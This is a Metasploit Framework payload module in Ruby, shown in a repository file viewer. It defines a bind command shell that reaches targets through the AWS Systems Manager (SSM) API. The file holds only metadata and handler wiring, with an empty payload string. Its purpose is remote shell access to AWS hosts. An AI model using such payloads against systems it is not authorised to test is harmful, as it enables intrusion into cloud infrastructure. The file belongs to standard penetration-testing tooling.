Files
metasploit-gs/modules/payloads/singles/generic/shell_bind_aws_ssm.rb
T
2023-04-19 18:05:50 -04:00

38 lines
926 B
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 0
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(
merge_info(
info,
'Name' => 'Command Shell, Bind SSM (via AWS API)',
'Description' => 'Creates an interactive shell using AWS SSM',
'Author' => 'RageLtMan <rageltman[at]sempervictus>',
'License' => MSF_LICENSE,
'Platform' => '',
'Arch' => ARCH_ALL,
'Handler' => Msf::Handler::BindAwsSsm,
'Session' => Msf::Sessions::AwsSsmCommandShellBind,
'Payload' => {
'Offsets' => {},
'Payload' => ''
}
)
)
end
def on_session(session)
super
session.arch.clear # undo the ARCH_ALL amalgamation
end
end